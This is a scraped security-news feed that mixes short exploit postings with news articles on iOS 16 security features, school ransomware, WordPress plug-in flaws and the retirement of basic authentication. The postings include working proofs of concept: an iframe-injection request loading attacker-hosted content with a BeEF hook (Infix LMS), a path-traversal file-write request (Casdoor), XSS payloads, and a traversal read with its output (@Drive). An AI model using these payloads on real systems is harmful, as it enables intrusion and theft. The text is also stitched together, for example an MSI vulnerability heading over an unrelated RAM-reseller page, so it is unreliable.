Infix LMS version 4.3.0 suffers from an iframe injection vulnerability.

# Exploit Title: Infix LMS - Learning Management System IFRAME Injection 
# Exploit Author: th3d1gger 
# Vendor Homepage: https://codecanyon.net 
# Software Link: https://codecanyon.net/item/infixlms-learning-management-system/30626608 
# Version: 4.3.0 
# Tested on Ubuntu 18.04 
sign up as teacher 
go course page and try to add course or edit 
with bypass special char restrict on post request with burp or etc, inject iframe with beef hook or else on any note-editor field

--request-- 
POST /admin/course/updateCourse HTTP/1.1 
Host: localhost 
Content-Length: 3855 
Cache-Control: max-age=0 
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99" 
sec-ch-ua-mobile: ?0 
sec-ch-ua-platform: "Linux" 
Upgrade-Insecure-Requests: 1 
Origin: http://localhost 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydcMGShie2VwdqOn2 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 
Sec-Fetch-Site: same-origin 
Sec-Fetch-Mode: navigate 
Sec-Fetch-User: ?1 
Sec-Fetch-Dest: document 
Referer: http://localhost/admin/course/course-details/7?type=courseDetails 
Accept-Encoding: gzip, deflate 
Accept-Language: en-US,en;q=0.9 
Cookie: XSRF-TOKEN=eyJpdiI6IlhIUjU2U3FiTUMzQzZxT2E0OVVhZ1E9PSIsInZhbHVlIjoiRDBWUnFuakRhbTlHMStIb0xaRGp3YndQY3lla0RWcjZ2N3VyUUZMUzU1M004azBNNFk2QlBQNnJGSzRxWnh3bVppZ1hBcmRaOEV3TWd0L2V3R3FXcTZTQVpMQWxFSXQvOE00a3NZK0tjaDNqNzJ4ckdQc2psN2tMUzJaK3kzaDgiLCJtYWMiOiIxMjNjZTExZGE1MzUzNmQ0ZGMxMzk3Y2Y5NmEwMjZjNjdhZDEyNDU5ODYwYTVhZTZjM2UwN2VhNzZiMGY0OTI5IiwidGFnIjoiIn0%3D; infix_lms_session=eyJpdiI6Im1hSEwwZ3ZlbGJUVGpqTFJLSEdkOGc9PSIsInZhbHVlIjoiSUNJbDZMbmNLSWVlWm1OU3BqYVpYYTkzK3BVN0xxaG1qZnpCVis1TjAwd1FRV3RKUlRNbGdleUhaUWRpdXMwTmxtMFJjc3BTUTV2Ty9zLzkyTWZBckpRTUlsVEc1dmlVbzRwOHRhdW1nSWpNdkRnbmNUMGFqZFUyVml2UDBDclMiLCJtYWMiOiIzZjBmNjVlNDg0MjFmN2NiYjI3ZmIxNmM0YjlkMjE1MGZjZTVlN2Y5N2JmYTcwOWM1ZDA2ZmU4MzIzYzI2YTExIiwidGFnIjoiIn0%3D 
Connection: close

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="_token"

0GtujIh7Yz86xnBbUyOboiarXjZ1msvhLnEv8Bft 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="type"

1 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="drip"

0 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="title"

Introduction to Programming and App Development 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="id"

7 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="requirements"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="files"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="about"

 <iframe src="http://192.168.1.18:3000/uploads/test.html"><div> </div> Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text 
 ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="files"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="outcomes"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="files"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="category"

4 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="sub_category"

7 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="mode_of_delivery"

1 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="quiz"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="level"

2 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="language"

19 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="duration"

10 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="complete_order"

0 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="price"

20 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="is_discount"

1 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="discount_price"

10 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="host"

Youtube 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="trailer_link"

https://www.youtube.com/watch?v=mlqWUqVZrHA 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="vimeo"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="vdocipher"

https://www.youtube.com/watch?v=mlqWUqVZrHA 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="file"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="scope"

1 
------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="image"; filename="" 
Content-Type: application/octet-stream

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="meta_keywords"

------WebKitFormBoundarydcMGShie2VwdqOn2 
Content-Disposition: form-data; name="meta_description"

------WebKitFormBoundarydcMGShie2VwdqOn2--

Infix LMS 4.3.0 IFRAME Injection

Safety Check and Lockdown Mode give people in vulnerable situations ways to quarantine themselves from acute risks.

Apple has long said that it offers software that is secure and private enough for all users by default, without special tiers or paid services. As digital threats to its users expand, though, the company has had to evolve this philosophy. And today's release of iOS 16 comes with two new features meant to help protect people facing very specific crises in their lives.

Safety Check and Lockdown Mode are very different tools, but Apple has built them both into its latest mobile operating system release as lifelines for digital worst-case scenarios. 

Apple designed Safety Check as a feature for users who are at risk for, or currently experiencing, domestic abuse. The tool centralizes a number of controls in one place to make it easier for users to manage and revoke access to their location data and reset privacy-related permissions. Lockdown Mode, on the other hand, is meant for users who potentially face targeted spyware attacks and aggressive state-backed hacking. The feature comprehensively restricts any nonessential iOS features so there are as few potential points of entry to a device as possible. As more governments and repressive entities around the world have begun purchasing powerful commodity spyware to target individuals of particular importance or interest, iOS's general security defenses haven't been able to keep pace with these specialized threats.

“I do think that things like Lockdown Mode and Safety Check are good,” says Thomas Reed, director of Mac and mobile platforms at the antivirus maker Malwarebytes. “People criticize Apple for not opening up iOS enough, and those folks would say this is just a token effort to silence critics. I don’t agree, though. For the nation-state-type stuff and risks users may be facing from people close to them, I think these new features will absolutely help within the paradigm of Apple’s current security model.”

Many mobile security researchers, including Reed, see major tradeoffs in Apple's philosophical approach to securing iOS. The mobile operating system is extremely locked down and can't be monitored for suspicious activity the way other operating systems can be. The benefit of this is that attackers are boxed out in the same way defenders are, but when hackers find and exploit a vulnerability, they can do it without being seen. Given this premise, the creation of purpose-built protective tools like Safety Check and Lockdown Mode is not just a logical progression but a necessary one.

“The more Apple locks down iOS to improve end user security, the harder it becomes for the security research community to investigate and identify vulnerabilities,” says Amanda Gorton, CEO of the of the mobile virtualization company Corellium. “I think it's commendable that Apple is taking measures to address security threats that are only ever likely to impact a tiny fraction of its user base.”

For iOS users dealing with harassment or abuse at home, Safety Check offers a few options to take back some digital control. For a user who has concerns and wants to rein in the access other people may have to their location information and other data, Safety Check offers a tool called Manage Sharing & Access. This tool details the people and apps that have access to different information, like who is connected through Find My Friends or which apps can use a device's microphone. It also includes walkthroughs so users can review their security settings. The Emergency Reset feature, meanwhile, is like a panic button if you think someone has gotten access to your device and set it so you are easier to track and surveil. Emergency Reset can revoke all access at once, resetting privacy permissions, signing you out of iCloud on all other devices, and limiting where your account can send and receive texts through Messages.

Apple says that “Safety Check can be helpful to users whose personal safety is at risk from domestic or intimate partner violence by quickly removing all access they’ve granted to others." 

To access the features, go to **Settings**, then **Privacy & Security**, and then **Safety Check**. 

Lockdown Mode is different in the sense that it is almost a parallel universe that users can move their iPhones into where luxuries like link previews in Messages, shared albums in Photos, and FaceTime calls from phone numbers and accounts you haven't called before are all blocked. In exchange, the goal is to make it much more difficult for commercial spyware vendors to discover and take advantage of complex exploit chains that combine vulnerabilities in multiple iOS features to take control of devices.

“While the vast majority of users will never be the victims of highly targeted cyberattacks, we will work tirelessly to protect the small number of users who are,” Apple’s head of security engineering and architecture, Ivan Krstić, said when the feature was announced in July. “That includes continuing to design defenses specifically for these users.”

Turn on Lockdown Mode in iOS 16 by going to **Settings**, then **Privacy and Security**, then **Lockdown Mode**.

Though Apple doesn't intend either feature to become a hot trend for most users, the fact is that the tools may find audiences and use cases beyond their intended populations. And when it comes to Lockdown Mode, in particular, one can only imagine what strategies researchers and attackers alike may develop to attack even this most hardened version of commercial iOS. But both features offer new and expanded opportunities for users to make it more difficult for adversaries of all sorts to achieve the level of access they seek. And both make it easier for Apple to fix new vulnerabilities and workarounds that arise more easily. Rather than having to make substantial changes, Apple can simply refine Safety Check and Lockdown Mode to address the latest concern.

“There’s been some debate about whether Lockdown Mode will actually prevent spyware attacks like infections from NSO Group's Pegasus,” Malwarebytes Reed says. “It’s possible it won’t prevent all possible means of infection, but it reduces the attack surfaces and makes it harder for attackers. As much as I’d personally like to be able to have greater visibility into iOS, I think Apple’s doing the right thing."

Apple's App Store, though, is one domain that Lockdown Mode and Safety Check don’t address. Researchers have found malicious apps that got approved for the App Store in the past, and as other avenues are closed off to attackers, they may increasingly refine their techniques for developing stealthily malicious apps in an attempt to make up ground. 

“The specific elements of Lockdown Mode give us insight into what Apple sees as the most common attack vectors on an iPhone today,” Corellium's Gorton says. But “Lockdown Mode doesn't seem to restrict access to third-party apps. It's possible that as Apple limits the attack surface for native features, the attack focus may increasingly shift to apps from the App Store. That could be problematic for a couple of reasons. One, we know these these apps undergo relatively limited review before making it to the App Store. And two, this would increase the burden of security mitigations on third-party developers, but the locked-down nature of iOS makes it increasingly difficult for app developers to adequately test the security of their own apps.”

Apple's changing philosophy on specialized security and privacy protections is a welcome step, but it may apply its own evolutionary pressures to the iOS security field that move attackers' focus without dampening their zeal.

iOS 16 Has Two New Security Features for Worst-Case Scenarios

An issue in Micro-Star International MSI Feature Navigator v1.0.1808.0901 allows attackers to download arbitrary files regardless of file type or size.

We buy ram memory of all major brands like Crucial, SanDisk, Kingston, Dell, Apple, HP and other major brands. Branded RAM gives you higher value. If your RAM memory still have sticker on that, then you are at luck, we can provide you better pricing. We accept DDR2 and DDR3 types of RAM Memory. We also accept RAM memory from old Mac computer and laptops. You can sell us RAM in bulk quantity as well. We are buying server RAM memory also. Just fill the form on bottom of this page and we will get back to you as soon as possible.

**Why you choose Microstar?**

*   We are eBay Power Seller.
*   We are in this industry more than 3 decades.
*   We pay you most of your RAM memory.
*   We buy RAM memory from computer, laptop and server of all types.
*   We process your payment fast.

**We accept DDR2 and DDR3 RAM Memory of following brands:**

Oracle-Sun Microsystems

Samsung

Dell

Crucial

Micron

IBM

Hynix

HP

Edge

Corsair

Cisco

All other brands

**Sell Hard Drives, Sell used hard drives for cash**

Convert your excess storage in to cash by selling your old hard disk drives. We buy old used or refurbished hard drives. We accept HDDs and SSDs from computer, laptop, server etc.

Mostly we buy all size 2.5” and 3.5” storage types of hard disk drives and solid state drives. We buy hard disk drives of all major brands like Samsung, GMBT, Western Digital, Dell, IBM, Seagate etc.

**Microstar**

9216 Lazy Lane, Tampa Florida 33614.  
Email: microstar@verizon.net  
Store hours are by appointment only.

**President**

Hello, I am Ray Margarit and I am the President of Microstar. I am probably at the office now. Please call me at: (813) 667-1000.

**Testing**

We have very efficient & strenuous testing methods. We are Department of Defense certified in removing data from hard drives.

We are ALWAYS looking to buy large quantities of used software, used CPU chips, used memory chips, used hard drives, used monitors, used cdroms, used memory ram, used printers, used motherboards, used sdram, used video cards, such brands like; Pentium, AMD, Seagate, Western Digital, Dell, IBM, HP, Intel and others, as well as other computer related items which companies could sell after upgrades. We actually buy and sell all used electronic equipment.

**We are an eBay PowerSeller, See for yourself**

The Microstar Ebay store offers top quality brands in Memory, CPUs, Hard Drives, and other computer components and peripherals. You can sell RAM, Memory, Hard Disks, Processors, Motherboards and other computer scraps in bulk as well. We sell very fast as we are eBay Power Seller.

**Seller Form. We Buy. Sell to us!**

Please type in a description of the items that you would like to sell and the total price for them. If we are interested, we will respond with an e-mail message.

CVE-2022-34110: Sell Memory, Sell RAM, Sell Hard Drives

Plus: Albania cuts ties with Iran, claims of a TikTok data breach that didn’t happen, and much more.

Russia’s full-scale invasion of Ukraine hasn’t gone to Vladimir Putin’s plan: Its troops have suffered devastating losses, failed to capture key Ukrainian cities, and been pushed back toward Russia. However, domestically, the Kremlin has succeeded in further suppressing its citizens—including blocking independent news media and other access to impartial information. Now, a new tool lets people in Russia access websites the Kremlin has blocked, giving them access to news that’s not dictated by the state’s propaganda machine.

The Biden administration is reportedly readying itself to take action against TikTok, following years of suggestions that the Chinese-owned app is a threat to national security. This week we looked at the problem with TikTok: that lawmakers can’t decide on what threat, if any, the app really poses.

Elsewhere, Apple revealed the new iPhone 14. Alongside this, it announced that iOS 16 will be available for people to download from September 12. This means Apple’s new passkey technology, which eliminates the need for passwords, will be available to millions of people. Here’s everything you need to know about Apple’s passkeys.

But wait, there’s more! Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

With more than 400,000 students ranging from kindergarten to 12th grade, the Los Angeles Unified School District is one of the largest school districts in the US. On September 6, the district became the latest to be targeted by ransomware. In a statement published online, the district’s administrators said it had detected “unusual activity” within its networks, saying it had been targeted by ransomware; despite the attack, students have been able to attend school.

The attack prompted a large response from officials, with the FBI and Department of Homeland Security assisting local law enforcement. Students and staff have lost access to their email systems, local reports say. It is also unclear, according to reports, whether students' information, including disciplinary records and assessments, was accessed by the attackers. The school district says that students and employees must reset their passwords to their school accounts while physically attending school district sites. “The District has staggered password reset access to minimize congestion from simultaneous users accessing the website,” officials said in a statement.

The Vice Society ransomware group has claimed responsibility for the attack. Following the incident, the Cybersecurity and Infrastructure Security Agency (CISA) and other partners published a warning about Vice Society, saying it has been “disproportionately targeting the education sector.” The Los Angeles attack is the latest against educational institutions: According to a report by security firm Sophos based on a survey of 499 respondents, 56 percent of lower education and 64 percent of higher education organizations were hit by ransomware in the past year, a “considerable increase” from the previous year.

Back in July, the government websites of Albania were knocked offline. Last month, security company Mandiant researchers revealed that Iranian hackers, working on behalf of Tehran, were likely to be behind the attacks, which took out public services for hours. “These are disruptive attacks, which affect the lives of everyday Albanians who live within the NATO alliance,” John Hultquist, Mandiant’s vice president of intelligence, told WIRED when it published its findings.

This week, the government of Albanian took the unprecedented step to cut diplomatic ties with Iran, accusing it of launching the cyberattack. The country also ordered Iranian embassy staff to leave the country. “The deep investigation put at our disposal undeniable evidence that the cyberattack against our country was orchestrated and sponsored by the Islamic Republic of Iran which had involved four groups for the attack on Albania,” prime minister Edi Rama said in a statement. (Microsoft conducted the investigation for the Albanian government.)

Hackers Target Los Angeles School District With Ransomware

Casdoor v1.97.3 was discovered to contain an arbitrary file write vulnerability via the fullFilePath parameter at /api/upload-resource.

Hi, I found a security issue, when the upload provider is Storage Local File System, the fullFilePath parameter of the interface /api/upload-resource will have a directory spanning problem, the user can specify a relative path to write malicious files to the file system, or even overwrite the files, my request message is shown below：

POST /api/upload-resource?owner=built-in&user=admin&application=app-built-in&tag=custom&parent=provider\_storage\_local\_file\_system&fullFilePath=resource%2F%2e%2e%2F%2e%2e%2Fweb%2Fbuild%2Fflag.html&provider=provider\_storage\_local\_file\_system HTTP/1.1
Host: door.casdoor.com
Cookie: casdoor\_session\_id=2fd9ab275d8d65ea296ab327fd92166a
Content-Length: 192
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUPAwhIoXMrbemuJM
Accept: \*/\*
Origin: https://door.casdoor.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://door.casdoor.com/resources
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

\------WebKitFormBoundaryUPAwhIoXMrbemuJM
Content-Disposition: form-data; name="file"; filename="spider.png"
Content-Type: image/png

I'm here.
\------WebKitFormBoundaryUPAwhIoXMrbemuJM--

Then we can find out that the problem does occur by following this link。  
https://door.casdoor.com/flag.html

CVE-2022-38638: Arbitrary file write/overwrite Vulnerability · Issue #1035 · casdoor/casdoor

The critical flaw in BackupBuddy is one of thousands of security issues reported in recent years in products that WordPress sites use to extend functionality.

Attackers are actively exploiting a critical vulnerability in BackupBuddy, a WordPress plug-in that an estimated 140,000 websites are using to back up their installations.

The vulnerability allows attackers to read and download arbitrary files from affected websites, including those containing configuration information and sensitive data such as passwords that can be used for further compromise.

WordPress security vendor Wordfence reported observing attacks targeting the flaw beginning Aug. 26, and said it has blocked close to 5 million attacks since then. The plug-in's developer, iThemes, issued a patch for the flaw on Sept. 2, more than one week after the attacks began. That raises the possibility that at least some WordPress sites using the software were compromised before a fix became available for the vulnerability.

**A Directory Traversal Bug**

In a statement on its website, iThemes described the directory traversal vulnerability as impacting websites running BackupBuddy versions 8.5.8.0 through 8.7.4.1. It urged users of the plug-in to immediately update to BackupBuddy version 8.75, even if they are not currently using a vulnerable version of the plug-in.

"This vulnerability could allow an attacker to view the contents of any file on your server that can be read by your WordPress installation," the plug-in maker warned.

iThemes' alerts provided guidance on how site operators can determine if their website has been compromised and steps they can take to restore security. These measures included resetting the database password, changing their WordPress salts, and rotating API keys and other secrets in their site-configuration file.

Wordfence said it had seen attackers using the flaw to try to retrieve "sensitive files such as the /wp-config.php and /etc/passwd file which can be used to further compromise a victim."

**WordPress Plug-in Security: An Endemic Problem**

The BackupBuddy flaw is just one of thousands of flaws that have been disclosed in WordPress environments — almost all of them involving plug-ins — in recent years.

In a report earlier this year, iThemes said it identified a total of 1,628 disclosed WordPress vulnerabilities in 2021 -- and more than 97% of them impacted plug-ins. Nearly half (47.1%) were rated as being of high to critical severity. And troublingly, 23.2% of vulnerable plug-in had no known fix.

A quick scan of the National Vulnerability Database (NVD) by Dark Reading showed that several dozen vulnerabilities impacting WordPress sites have been disclosed so far in the first week of September alone.

Vulnerable plug-ins are not the only concern for WordPress sites; malicious plug-ins are another issue. A large-scale study of over 400,000 websites that researchers at the Georgia Institute of Technology conducted uncovered a staggering 47,337 malicious plug-ins installed on 24,931 websites, most of them still active.

Sounil Yu, CISO at JupiterOne, says the risks inherent in WordPress environments are like those present in any environment that leverages plug-ins, integrations, and third-party applications to extend functionality.

"As with smartphones, such third-party components extend the capabilities of the core product, but they are also problematic for security teams because they significantly increase the attack surface of the core product," he explains, adding that vetting these products is also challenging because of their sheer number and lack of clear provenance.

"Security teams have rudimentary approaches, most often giving a cursory look at what I call the three Ps: popularity, purpose, and permissions," Yu notes. "Similar to app stores managed by Apple and Google, more vetting needs to be done by the marketplaces to ensure that malicious \[plug-ins, integrations, and third-party apps\] do not create problems for their customers," he notes.

Another problem is that while WordPress is widely used, it often is managed by marketing or Web-design professionals and not IT or security professionals, says Bud Broomhead, CEO at Viakoo.

"Installing is easy and removing is an afterthought or never done," Broomhead tells Dark Reading. "Just like the attack surface has shifted to IoT/OT/ICS, threat actors aim for systems not managed by IT, especially ones that are widely used like WordPress."

Broomhead adds, "Even with WordPress issuing alerts about plug-ins being vulnerabilities, other priorities than security may delay the removal of malicious plug-ins."

Attackers Exploit Zero-Day WordPress Plug-in Vulnerability in BackupBuddy

mbDrive Lite WiFi Flash Disk version 1.4.0 suffers from a cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: mbDrive Lite - WiFi flash disk 1.4.0 Reflected XSS# Date: Sep 8, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage:https://apps.apple.com/us/developer/haw-yuan-yang/id291212805# Software Link:https://apps.apple.com/us/app/mbdrive-lite-wifi-flash-disk/id343254033# Version: 1.4.0# Tested on: iPhone ios 15.6poc:http://192.168.1.187:8080/list?path=%3Cscript%3Ealert(%271%27);%3C/script%3E

mbDrive Lite WiFi Flash Disk 1.4.0 Cross Site Scripting

AirDisk version 7.5.5 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: AirDisk 7.5.5 File Manager Stored XSS# Date: Sep 8, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://apps.apple.com/us/developer/felix-yew/id505904424# Software Link:https://apps.apple.com/us/app/airdisk-file-manager/id566530748# Version: 7.5.5# Tested on: iPhone ios 15.61/ Starting the server ( File Transfer > Wi-fi File Transfer )2/ Go to browser3/ Enter the address showing on app eg: http://192.168.1.187:80804/ Create a folder with the name: rose'"><img src=xonerror=alert(document.location)>5/ Refresh.

AirDisk 7.5.5 Cross Site Scripting

@Drive version 2.8 suffers from a local file inclusion vulnerability.

    # Exploit Title: @Drive 2.8  Local File inclusion# Date: Sep 8, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://evolutive.co/# Software Link: https://apps.apple.com/us/app/drive/id578982909# Version: 2.8# Tested on: iPhone ios 15.6GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1Host: 192.168.1.187User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376eSafari/8536.25Accept: */*Referer: http://192.168.1.187/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close--------HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: 213Accept-Ranges: bytesDate: Thu, 08 Sep 2022 14:26:16 GMT### Host Database## localhost is used to configure the loopback interface# when the system is booting.  Do not change this entry.##127.0.0.1 localhost255.255.255.255 broadcasthost::1             localhost

@Drive 2.8 Local File Inclusion

Microsoft moves ahead with a plan to sunset basic authentication, and other providers are moving — or have moved — to requiring more secure authentication as well. Is your company ready?

Microsoft and major cloud providers are starting to take steps to move their business customers toward more secure forms of authentication and the elimination of basic security weaknesses — such as using usernames and passwords over unencrypted channels to access cloud services.

Microsoft, for example, will remove the ability to use basic authentication for its Exchange Online service starting Oct. 1, requiring that its customers use token-based authentication instead. Google meanwhile has auto-enrolled 150 million people in its two-step verification process, and online cloud provider Rackspace plans to turn off cleartext email protocols by the end of the year.

The deadlines are a warning to companies that efforts to secure their access to cloud services can no longer be put off, says Pieter Arntz, malware intelligence researcher at Malwarebytes, who penned a recent blog post highlighting the coming deadline for Microsoft Exchange Online users.

"I think the balance is shifting to the point where they feel they can convince users that the extra security is in their best interest, while trying to offer solutions that are still relatively easy to use," he says. "Microsoft is often a trendsetter and announced these plans years ago, but you will still find organizations straggling and struggling to take the appropriate measures."

**Identity-Related Breaches on the Rise**

While some security-conscious companies have taken the initiative to secure access to cloud services, others have to be prodded — something that cloud providers, such as Microsoft, are increasingly willing to do, especially as companies struggle with more identity-related breaches. In 2022, 84% of companies suffered an identity-related breach, up from 79% in the previous two years, according to the Identity Defined Security Alliance's "2022 Trends in Securing Digital Identities" report.

Turning off basic forms of authentication is a simple way to block attackers, which are increasingly using credential stuffing and other mass access attempts as a first step to compromising victims. Companies with weak authentication leave themselves open to brute-force attacks, abuse of reused passwords, credentials stolen through phishing, and hijacked sessions.

And once attackers have gained access to corporate email services, they can exfiltrate sensitive information or conduct damaging attacks, such as business email compromise (BEC) and ransomware attacks, says Igal Gofman, head of research for Ermetic, a provider of identity security for cloud services.

"The use of weak authentication protocols, especially in the cloud, can be very dangerous and lead to major data leaks," he says. "Nation-states and cybercriminals are constantly abusing weak authentication protocols by executing a variety of different brute-force attacks against cloud services."

The benefits of shoring up the security of authentication can have immediate benefits. Google found that auto-enrolling people in its two-step verification process resulted in a 50% decrease in account compromises. A significant portion of companies that suffered a breach (43%) believe that having multifactor authentication could have stopped the attackers, according to the IDSA's "2022 Trends in Securing Digital Identities" report.

**Edging Toward Zero-Trust Architectures**

In addition, cloud and zero-trust initiatives have driven the pursuit of more secure identities, with more than half of companies investing in identity security as part of those initiatives, according to the IDSA's Technical Working Group, in an email to Dark Reading.

For many companies, the move away from simple authentication mechanisms that rely on merely a user's credentials has been spurred by ransomware and other threats, which have caused companies to look to minimizing their attack surface area and hardening defenses where they can, the IDSA's Technical Working Group wrote.

"As the majority of companies accelerate their zero-trust initiatives, they are also implementing stronger authentication where feasible — although, it is surprising that there are still some companies struggling with the basics, or \[that\] haven’t yet embraced zero trust, leaving them exposed," researchers there wrote.

**Obstacles to Secure Identities Remain**

Every major cloud provider offers multifactor authentication over secure channels and using secure tokens, such as OAuth 2.0. While turning on the feature may be simple, managing secure access can lead to an increase in work for the IT department — something for which businesses need to be ready, says Malwarebytes' Arntz.

Companies "sometimes fail when it comes to managing who has access to the service and which permissions they require," he says. "It is the extra amount of work for IT staff that comes with a higher authentication level — that is the bottleneck."

Researchers at the IDSA's Technical Working Group explained that legacy infrastructure is also a hurdle.  

"While Microsoft has been in the process of moving their authentication protocols forward for some time, the challenge of migrating and backward compatibility for legacy apps, protocols, and devices has delayed their adoption," they noted. "It's good news that the end is in sight for basic auth."

Consumer-focused services are also slow to adopt more secure approaches to authentication. While Google's move has improved security for many consumers, and Apple has enabled two-factor authentication for more than 95% of its users, for the most part consumers continue to only use multifactor authentication for a few services.

While almost two-thirds of companies (64%) have identified initiatives to secure digital identities as one of their top three priorities in 2022, only 12% of organizations have implemented multifactor authentication for their users, according to the IDSA's report. However, firms are looking to provide the option, with 29% of consumer-focused cloud providers currently implementing better authentication and 21% planning on it for the future.

Tag

#apple